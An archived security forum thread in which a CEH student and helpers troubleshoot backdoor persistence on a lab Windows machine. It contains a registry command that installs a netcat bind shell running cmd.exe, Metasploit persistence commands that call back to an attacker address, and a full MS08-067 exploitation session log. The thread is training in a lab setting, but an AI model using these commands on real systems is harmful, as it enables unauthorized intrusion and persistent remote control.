|
Title: netcat question Post by: Dalobo on January 27, 2013, 07:45:47 PM I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box.
But I ran across a few things I could not figure out. Steps: Got a meterpreter shell on the victim Uploaded nc.exe to the system32 folder Set the regkey for running nc in listening mode at startup Logged in as the admin on the victim machine Rebooted the victims server using meterpreter reboot cmd Waited for windows to reboot Logged in as admin on the victim server Connected from BT using nc IP port command Questions: 1. When in meterpreter, why can I only reboot the remote victims machine when someone is logged in on that machine? 2. Why can I only connect to netcat on the victims machine when someone is logged in on that machine? What am I doing wrong? Doing it this way just makes me more likely to get caught. Thank you, Dalobo Title: Re: netcat question Post by: Dark_Knight on January 27, 2013, 08:52:04 PM Having established a meterpreter session, do you migrate to another process?
Title: Re: netcat question Post by: Dalobo on January 28, 2013, 04:53:47 PM No, I did not. I used the MS08-67 to own the box. When I typed shell, and then whoami - I think I got administrator. That would make sense. I was not NT Authority.
I will have to try this again, but see about getting NT Authority. I will let you know once I have time to work on it again Thank you Dark_Knight. Dalobo Title: Re: netcat question Post by: ajohnson on January 28, 2013, 05:41:23 PM You should be SYSTEM with MS08-067, not administrator.
It would help if you post the exact registry key you added and the shutdown/restart command you're trying to use. Title: Re: netcat question Post by: Dalobo on January 28, 2013, 06:58:12 PM OK. I redid this and I am nt authority, and the reboot command worked without having me log into the victim as admin.
I am still unable to connect using netcat. I set the following key using this command meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\RUN -v BackDoor -d c:\\windows\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe" meterpreter > reboot Once rebooted, I open a terminal and type: nc 192.168.5.150 1234 I get connection refused. I will do some more testing and get back to you. Thank you, Dalobo Title: Re: netcat question Post by: superkojiman on January 28, 2013, 10:01:58 PM Is the Windows firewall turned on? Can you check if netcat running and listening on the port you specified after you rebooted?
Title: Re: netcat question Post by: ajohnson on January 28, 2013, 10:24:53 PM I believe all the "run" registry keys require a user to log in. The "run" under HKLM applies to all users, and the "run" under HKU will only apply to that specific user.
If you haven't played around with it yet, do a run persistence -h inside of a meterpreter session. The -S option will allow you to install a service that should run upon startup. Title: Re: netcat question Post by: Dalobo on February 02, 2013, 07:47:06 PM I still can't get netcat to connect without a user being logged in.
I did give the persistence a try and can now have meterprrter call home whenever I lose the sessions. :) I used Code: run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10 I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time? Thank you, Dalobo Title: Re: netcat question Post by: ajohnson on February 02, 2013, 08:12:21 PM Maybe you can create a netcat service similar to what run persistence does using sc: http://technet.microsoft.com/en-us/library/cc990289(v=ws.10).aspx
There really isn't a practical reason for an admin to use netcat to legitimately administer a server. Remote desktop, psexec, PowerShell, etc. would be used in practice. Title: Re: netcat question Post by: Dalobo on February 03, 2013, 07:26:15 AM Thanks. I thought netcat was a way for admins to administer their boxes, without using RDP. While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection then a netcat connection.
I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more. Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me. I am doing all of this testing/learning for my CEH. Thanks again for all the help, Dalobo Title: Re: netcat question Post by: ajohnson on February 03, 2013, 12:47:55 PM I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it ;)
There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?): Code: # nc -vv google.com 80 Connection to google.com 80 port [tcp/http] succeeded! I also use it for copying information over the network where I don't want to setup something like file sharing. destination: # nc -lp 9999 > goodies.txt source: # cat /etc/passwd | nc 192.168.1.99 9999 Be sure to familiarize yourself with the netcat cheat sheet: http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf The port relaying stuff is pretty cool too. And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems. I'm not sure why you're not receiving a connection upon a reboot. It works for me: Code: msf > use exploit/windows/smb/ms08_067_netapi rhost => 192.168.1.50 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.99:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (749056 bytes) to 192.168.1.50 [*] Meterpreter session 1 opened (192.168.1.99:4444 -> 192.168.1.50:1031) at Sun Feb 03 10:49:22 -0700 2013 meterpreter > run persistence -A -S -X -i 5 -p 443 -r 192.168.1.99 [*] Creating a persistent agent: LHOST=192.168.1.99 LPORT=443 (interval=5 onboot=true) [*] Persistent agent script is 609700 bytes long [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\efdfhUSKx.vbs [*] Agent executed with PID 1200 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB [*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB [*] Creating service LendDpizgQ [*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/XXXXXX-AEF856CC_20130203.5054/clean_up__20130203.5054.rc meterpreter > [*] Meterpreter session 2 opened (192.168.1.99:443 -> 192.168.1.50:1034) at Sun Feb 03 10:51:03 -0700 2013 Background session 1? [y/N] msf exploit(ms08_067_netapi) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC 192.168.1.99:4444 -> 192.168.1.50:1031 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC 192.168.1.99:443 -> 192.168.1.50:1034 msf exploit(ms08_067_netapi) > sessions -i 2 [*] Starting interaction with 2... meterpreter > reboot Rebooting... meterpreter > exit [*] Meterpreter session 2 closed. Reason: User exit msf exploit(ms08_067_netapi) > [*] Meterpreter session 3 opened (192.168.1.99:443 -> 192.168.1.50:1035) at Sun Feb 03 10:52:04 -0700 2013 msf exploit(ms08_067_netapi) > sessions -K [*] Killing all sessions... [*] Meterpreter session 1 closed. [*] Meterpreter session 3 closed. msf exploit(ms08_067_netapi) > jobs Jobs ==== Id Name -- ---- 0 Exploit: multi/handler msf exploit(ms08_067_netapi) > [*] Meterpreter session 4 opened (192.168.1.99:443 -> 192.168.1.50:1025) at Sun Feb 03 10:52:44 -0700 2013 Make sure you have your listener (multi/handler) setup and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting. Way to actually get your hands dirty and not just memorize trivia for your CEH :) Title: Re: netcat question Post by: hayabusa on February 04, 2013, 07:11:40 AM Way to actually get your hands dirty and not just memorize trivia for your CEH :) ^^ +1
Powered by SMF 1.1.18 |
SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com |